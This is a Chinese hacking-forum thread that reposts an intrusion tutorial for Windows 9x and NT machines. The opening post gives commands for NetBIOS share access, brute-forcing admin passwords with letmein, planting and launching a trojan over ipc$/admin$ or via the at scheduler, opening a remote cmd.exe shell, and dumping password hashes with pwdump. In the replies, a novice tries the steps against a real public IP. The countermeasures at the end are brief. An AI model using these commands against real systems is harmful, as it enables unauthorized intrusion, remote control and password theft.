|
 | 作者: k_com [k_com]
 论坛用户 |
登录 |
| 请注意!此法非常危险!仅供参考,若出任何事,与我无关! 黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍一种win9x下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多了不细讲了。:) 2.判断对方上网的地点,开个DOS窗口键入tracert xx.xx.xx.xx 这时你的dos窗口上会有很多信息列出来,其中第4行和第5行反映的信息即是对方上网的地点。 3.得到对方电脑的名称,开个dos窗口键入nbtstat -a xx.xx.xx.xx 第一行是对方电脑的名称; 第二行是对方电脑所在工作组; 第三行是对方电脑的说明。 4.在windows目录下有一文件名为lmhosts.sam,将其改名为;lmhosts,删除其内容,将对方的IP及电脑名按以下格式写入文件:xx.xx.xx.xx 电脑名 5.开dos窗口键入nbstat -r 6.在“开始”--“查找”---“电脑”中输入对方电脑名称,出现对方电脑点击即可进入。 以上方法请不要乱用,本人对你使用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好方法就是隐藏你的IP地址。 (其实如果你要想成为一名受人尊重的真正的黑客,你首要做到的不应该是破坏,而是创造,你应该试着学些语言,至少c语言应该懂吧,另外perl和lisp也该学会,现在是网络时代,可能你每天都上网,但你能读得懂html吗?你知道网络上的数据信息是如何传到你的机子上然后在你的屏幕上显示出来的吗?当然这些对于一般的人来说是不必要的,但一直想作为黑客的你怎么能连这些最基本的都不懂呢?:)操作系统你应该试着装一个最新版本的unix或linux吧,什么!你还在用“瘟酒吧”那我就没话可说了。为什么装unix或linux?因为他们可以让你读很多程序的源代码,试着去读些别人的代码特别是那些大师级的,对你本身写程序有很大的帮助的。。。) -----远程入侵nt 近日写一篇介绍使用netbus或netspy远程入侵nt系统,感觉真是。。。看来nt系统的共享机制如果不配合防火墙使用,sbm会给你造成很大麻烦。连小小的一只木马都可以让nt管理员头大。 1.使用扫描工具查找nt主机(扫描工具我用过最好的是netview,可以在华军软件园找到) 2.确定攻击目标后,使用letmein对目标主机进行攻击,如: letmein file://x.x.x.x/-all -g mypwd(对\\x.x.x.x上所有用户攻击) letmein file://x.x.x.x/-admin -g mypwd(对\\x.x.x.x上管理员攻击) letmein file://x.x.x.x/-all -d mypwd(显示\\x.x.x.x上所有用户) 注:- 确定目标后,收集目标信息并尝试取得非法资源 3.当letmein获取相关管理员权限后,使用ms提供的合法命令: net use \\x.x.x.x\ipc$"pass"/user:"user"连接远程资源并将木马拷入远程目标主机。如:copy x:\netserver.exe\\x.x.x.x\admin$\system32 4.使用合法ms命令远程启动木马服务端程序:netsvc\\x.x.x.x schedule/start at\\x.x.x.x hh:mm netserver.exe/port:yourport/nomsg该方法有其巧妙之处。利用nt的任务计划管理,在特定时候启动木马服务的另一种方法:将ntsrver.exe或其他运行程序copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器中输入http://x.x.x.x/scripts/ntsrver.exe/port:yourport或http://x.x.x.x/cgi-gin/ntsrver.exe/port:yourport木马服务将被启动,到此,该次攻击可以算成功了,远程资源已在别人控制之下。 另外,如果在远程使用app redirect 启动一个cmd.exe到特定端口,那么你可以telnet到该端口,更方便使用该远程资源。比如:使用pwdump将远程nt上所有用户和密码dump成文件,回传本地,使用其他工具如10phtcrack来运算。分析该次攻击的整体过程,不难看出,关键步骤是letmein取得admin权限,但是很不幸,就目前大多数(有些是省内的)nt服务管理员而言,密码对letmein只是多花几分钟而已。我对某些大的公共平台服务器进行扫描的结果是,除了solaris和linux系统之外,其余的nt被letmein猜中的几率有75%以上。而且在这些被进入的机器上,smb都在tcp/ip上跑,有两台配备防火墙,但是没有封闭对外137-139端口。 对策:1.还是老话,密码的选择问题,使用像..@2KjsfiM7v!09..这样的密码会让人和使用暴力破解的机器计算到cpu耗掉。 2.nt网络的适当配置,不要在对外的nc绑定共享服务是个好习惯,特别是tcp/ip协议。 3.防火墙的配置,评比一切不需要的服务端口,像netebui在tcp/ip上的137-139口,开这些口只会使你的系统处于危险的处境,如果非要在远程使用这些口的服务,建议使用其它软件来代替。 4.及时检查日记和监控服务的运行,定时对文件系统的权限受托关系进行检查。 [此贴被 冷焰(k_com) 在 09月09日22时18分 编辑过] |
| 地主 发表时间: 07/12 21:02 |
 | 回复: pyion [pyion]  论坛用户 |
登录 |
|
我用了一下你的方法,有点问题,我把我的步骤祥细给你看一下,看那儿错了,我是菜鸟,请指教: 1。确切定IP:218。28。114。142 2。 C:\>tracert 218.28.114.142 Tracing route to 218.28.114.142 over a maximum of 30 hops 1 1 ms <10 ms <10 ms gl.mshome.net [192.168.0.1] 2 1 ms 1 ms 1 ms 10.0.0.1 3 1 ms 1 ms 1 ms 61.54.192.105 4 1 ms 1 ms 1 ms 218.28.252.17 5 1 ms 1 ms 1 ms 61.168.233.53 6 15 ms 11 ms 9 ms 61.168.255.77 7 9 ms 185 ms 8 ms 61.168.255.130 8 8 ms 9 ms 8 ms 61.168.241.54 9 8 ms 8 ms 8 ms 218.28.114.142 Trace complete. 3.C:\>nbtstat -a 218.28.48.2 Host not found. 为什么说端口没有找到(HOST是不是端口的意思,请指教) 为什么?? |
| B1层 发表时间: 09/09 18:10 |
| 回复: k_com [k_com] 论坛用户 |
登录 |
|
host不是端口的意思,是主机~~没有找到主机~请确认你的ip~! 哗`厉害啊~n年前的帖了~!~! |
| B2层 发表时间: 09/09 22:56 |
 | 回复: 迷絮 [catmi]  版主 |
登录 |
|
为什么我在使用内网IP是会提示不能发现呢请指教。 我用的格式是nbtstat -a 192.168.0.21这个IP肯定存在 |
| B3层 发表时间: 09/13 11:46 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: windows9x入侵(转)